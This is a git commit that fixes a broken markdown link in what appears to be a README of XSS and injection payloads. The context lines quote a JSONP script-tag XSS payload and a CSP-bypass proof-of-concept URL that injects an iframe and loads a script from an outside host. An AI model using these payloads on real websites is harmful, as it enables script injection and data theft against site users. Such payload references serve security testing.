CSP bypass fix link

2025-02-20 13:46:05 +00:00 · 2018-09-01 15:38:57 +02:00 · 2018-09-01 15:38:57 +02:00 · 64e577b650
commit 64e577b650
parent fe52b32af8
1 changed files with 1 additions and 1 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -701,7 +701,7 @@ Exotic payloads
 <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
 ```

-### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa
+### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)

 Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)